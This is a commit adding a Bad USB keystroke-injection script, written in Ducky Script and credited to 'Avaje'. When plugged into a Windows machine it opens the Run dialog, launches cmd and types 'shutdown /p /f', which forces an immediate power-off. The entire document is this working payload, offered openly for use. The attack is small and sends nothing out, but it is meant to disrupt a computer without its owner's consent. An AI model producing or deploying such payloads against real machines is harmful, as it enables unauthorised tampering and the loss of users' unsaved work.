Added windows Bad USB script
This commit is contained in:
@@ -0,0 +1,14 @@
|
||||
REM Author: Avaje
|
||||
REM Description: Shuts down windows automatically
|
||||
REM Version: 1.0
|
||||
REM Category: Execution
|
||||
DELAY 750
|
||||
WINDOWS d
|
||||
DELAY 300
|
||||
WINDOWS r
|
||||
DELAY 300
|
||||
STRING cmd
|
||||
ENTER
|
||||
DELAY 1500
|
||||
STRING shutdown /p /f
|
||||
ENTER
|
||||
Reference in New Issue
Block a user